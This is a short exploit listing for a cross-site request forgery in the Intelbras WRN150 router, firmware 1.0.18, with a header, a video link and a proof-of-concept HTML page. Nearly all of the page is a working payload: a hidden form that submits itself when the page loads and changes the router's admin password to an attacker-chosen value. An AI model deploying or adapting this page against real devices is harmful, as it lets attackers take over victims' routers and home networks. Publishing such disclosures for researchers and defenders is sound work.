Share
Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery  
Date: 2019-10-25  
Exploit Author: Prof. Joas Antonio  
Vendor Homepage: https://www.intelbras.com/pt-br/  
Software Link: http://en.intelbras.com.br/node/25896  
Version: 1.0.18  
Tested on: Windows  
CVE : N/A  
  
####################  
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be  
  
<html>  
<body>  
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">  
<input type="hidden" name="GO" value="system_password.asp">  
<input type="hidden" name="SYSPSC" value="0">  
<input class="text" type="password" name="SYSOPS" value="hack123"/>   
<input class="text" type="password" name="SYSPS" value="mrrobot"/>   
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>   
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>